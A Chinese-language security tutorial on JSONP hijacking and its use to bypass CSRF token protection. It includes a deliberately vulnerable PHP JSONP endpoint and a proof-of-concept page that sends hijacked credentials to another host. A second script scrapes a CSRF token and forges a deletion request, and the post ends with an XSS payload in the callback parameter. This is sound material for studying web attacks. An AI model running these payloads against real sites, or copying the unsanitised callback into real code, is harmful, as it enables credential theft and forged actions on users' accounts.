JSONP绕过csrf防护token

什么是jsonp

jsonps(json whith padding) 是json的一种”使用模式”,可以让网页从别的域名(网站)哪里获取资料,即跨域读取数据.jsonp的语法和json很像,简单来说就是在json外部用一个函数包裹着,

callback({"name":"kean","msg":"获取成功"});

jsonp的原理就是动态插入带有跨域url的<script>标签,然后调用回调函数,把我们需要的json数据作为参数传入,通过一些逻辑把数据显示在页面上面.

常见的jsonp形式类似

http://www.test.com/index.html?jsonpcallback=hehe

传过去的hehe就是函数名,服务器端返回的是一个函数调用,可以理解为hehe是一个函数名字,而返回的json数据就是函数的参数,网站的前段只需要在编写代码处理函数返回的值就可以

jsonp劫持漏洞

<?php
header('Content-type: application/json');
$callback = $_GET["callback"];
//json数据
$json_data = '{"customername1":"user1","password":"12345678"}';
//输出jsonp格式的数据
echo $callback . "(" . $json_data . ")";
?>

image-20220608194307183

在返回值开头中可见aa,如果我们修改callback的值为其他的值,此处的返回值也会相应的改变.我们可以劫持callback参数,自己构造callback处理函数.受害者点击我们伪造的连接之后,像真正的jsonp接口发起请求,请求得到数据的处理方式由我们自己的callback处理函数处理,由此可以达到劫持目的.

1.html

<html>
<head>
<title>test</title>
<meta charset="utf-8">
<script type="text/javascript">
function hehehe(obj){
alert(obj["password"]);
var myForm = document.createElement("form");
myForm.action="http://wan/p1.php";
myForm.method = "GET";
for ( var k in obj) {
var myInput = document.createElement("input");
myInput.setAttribute("name", k);
myInput.setAttribute("value", obj[k]);
myForm.appendChild(myInput);
}
document.body.appendChild(myForm);
myForm.submit();
document.body.removeChild(myForm);
}
</script>
</head>
<body>
<script type="text/javascript" src="http://wan/p2.php?callback=hehehe"></script>
</body>
</html>

p2.php

<?php
header('Content-type: application/json');
$callback = $_GET["callback"];
//json数据
$json_data = '{"customername1":"user1","password":"12345678"}';
//输出jsonp格式的数据
echo $callback . "(" . $json_data . ")";
?>

p1.php

<?php
echo $_GET["customername1"];
echo "\n";
echo $_GET["password"];

image-20220608195447074

image-20220608195456607

我们这里只是展示了在用户点击之后的显示,我们完全可以不给用户显示这个页面,而直接发送到我们的服务器上面去.也就是说可以做到完全不可见.

绕过token防护进行scrf攻击

jsonp劫持其实是属于csrf攻击范畴的,毕竟要拿到敏感数据是需要用户登录并点击的,所以jsonp劫持是csrf攻击的一种手段.既然数据csrf攻击范畴了,那么jsonp劫持所做的自然也不只是读取敏感信息(其实在这一点上,单独的csrf攻击含不好去读取敏感数据),利用jsonp还可以在某些情况下绕过csrf常见防护形式之一的token防护.

首先,在目标站上的请求中发现总是有参数jscallback和htmlcallback,所以我在一个返回敏感信息的url后面添加了这两个参数,发现均有返回,成功确认此处有jsonp劫持漏洞,然后,开始去寻找更改的jsonp接口,返现整个网站上面都存在有jsono劫持,而不是单纯在某个连接上面,cancel这一情况的原因可能是网站每个页面上的通用代码出了问题,或者是某个js文件出了问题,查看几个页面的源代码,发现是第一种原因,在源代码中找到了过个jscallback和htmlcallback.

那么在对关键操作进行csrf漏洞挖掘的时候,发现整个表单中有一个隐藏的token值,那么既然全站都有jsonp,为什么不在这个操作页面上通过jsonp获取整个页面代码,读取其中的token值,在构造完整的表单,自动提交即可完成csrf攻击.

代码

<html>
<head>
<title>test</title>
<meta charset="utf-8">
</head>
<body>
<div id="test"></div>
<script type="text/javascript">
function test(obj){
// 获取对象中的属性值
var content = obj['html']
// 正则匹配出参数值
var token=content.match('token = "(.*?)"')[1];
// 添加表单节点
var parent=document.getElementById("test");
var child=document.createElement("form");
child.method="POST";
child.action="http://vuln.com/del.html";
child.id="test1"
parent.appendChild(child);
var parent_1=document.getElementById("test1");
var child_1=document.createElement("input");
child_1.type="hidden";child_1.name="token";child_1.value=token;
var child_2=document.createElement("input");
child_2.type="submit";
parent_1.appendChild(child_1);
parent_1.appendChild(child_2);
}
</script>
<script type="text/javascript" src="http://vuln.com/caozuo.html?htmlcallback=test"></script>
</body>
</html>

htmlcallback返回一个对象obj,以该对象作为参数传入test函数,操作对象中属性名为html的值,正则匹配出token,再加入表单,自动提交表单完成操作,用户点击该攻击页面即收到csrf攻击。在一个功能点完成csrf攻击后,我基本可以基于此,完成全站的csrf攻击。

但是,在操作另一个功能点时,发现该功能点还进行referer验证,需要绕过referer。绕过referer也是csrf攻击中常见的场景了,常见绕过方法:

  • 空referer
  • referer过滤不严谨

可以看到,想要通过jsonp劫持来绕过token进行csrf还是挺麻烦的,条件太多:

  1. 有jsonp劫持
  2. 能在源码里找到token
  3. 没有referer防护

jsonp除了连打csrf之外,还可以连打xss,即把callback参数值写成xss payload:

?callback=<script>alert('1')</script>